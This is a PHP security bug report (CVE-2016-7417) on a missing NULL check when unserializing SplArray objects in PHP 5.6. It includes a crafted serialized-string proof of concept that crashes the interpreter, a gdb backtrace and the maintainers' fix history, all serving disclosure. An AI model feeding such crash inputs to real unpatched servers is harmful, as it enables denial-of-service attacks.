Home Original page

Missing type check when unserializing SplArray

Sec Bug #73029 Missing type check when unserializing SplArray
Submitted: 2016-09-06 09:45 UTC Modified: 2016-09-16 13:41 UTC
From: ahihibughunter at gmail dot com Assigned: stas (profile)
Status: Closed Package: SPL related
PHP Version: 5.6.26RC1 OS: ALL
Private report: No CVE-ID: 2016-7417

 [2016-09-06 09:45 UTC] ahihibughunter at gmail dot com

Description:
------------
The return value is not checked and used on spl_array_get_dimension_ptr_ptr

static zval **spl_array_get_dimension_ptr_ptr(int check_inherited, zval *object, zval *offset, int type TSRMLS_DC) /* {{{ */
{
....
HashTable *ht = spl_array_get_hash_table(intern, 0 TSRMLS_CC); <--- here is not check ht with NULL

} 

Test script:
---------------
<?php
$a = 'C:11:"ArrayObject":19:0x:i:0;r:2;;m:a:0:{}}';
$m = unserialize($a);
$x = $m[2];
?>

Expected result:
----------------
No crash

Actual result:
--------------
$ gdb /data/php-src-PHP-5.6.26/sapi/cli/php
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
(gdb) r se.php
Starting program: /data/php-src-PHP-5.6.26/sapi/cli/php se.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
60              if (ht->inconsistent==HT_OK) {
(gdb) bt
#0  0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
#1  0x0000000000ac3625 in zend_hash_index_find (ht=0x0, h=2, pData=0x7fffffffaaf0)
    at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:938
#2  0x000000000089621a in spl_array_get_dimension_ptr_ptr (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:357
#3  0x000000000089664b in spl_array_read_dimension_ex (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:406
#4  0x000000000089679b in spl_array_read_dimension (object=0x7ffff7fc50b8, offset=0x7ffff7fc7940, type=0)
    at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:434
#5  0x0000000000af40b6 in zend_fetch_dimension_address_read (result=0x7ffff7f901e0, container=0x7ffff7fc50b8,
    dim=0x7ffff7fc7940, dim_type=1, type=0) at /data/php-src-PHP-5.6.26/Zend/zend_execute.c:1364
#6  0x0000000000b4ae0a in ZEND_FETCH_DIM_R_SPEC_CV_CONST_HANDLER (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:32849
#7  0x0000000000af5196 in execute_ex (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:363
#8  0x0000000000af521f in zend_execute (op_array=0x7ffff7fc5fd8)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:388
#9  0x0000000000ab0372 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /data/php-src-PHP-5.6.26/Zend/zend.c:1341
#10 0x0000000000a15aa2 in php_execute_script (primary_file=0x7fffffffd200)
    at /data/php-src-PHP-5.6.26/main/main.c:2613
#11 0x0000000000b64a18 in do_cli (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:994
#12 0x0000000000b65d71 in main (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:1378

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

 [2016-09-12 02:53 UTC] stas@php.net

-Summary: _zend_is_inconsistent null dereference +Summary: Missing type check when unserializing SplArray

 [2016-09-12 03:38 UTC] stas@php.net

-Assigned To: +Assigned To: stas

 [2016-09-12 05:13 UTC] ahihibughunter at gmail dot com

This patch look OK.

 [2016-09-13 04:04 UTC] stas@php.net

-Status: Assigned +Status: Closed

 [2016-09-16 13:41 UTC] kaplan@php.net

-CVE-ID: needed +CVE-ID: 2016-7417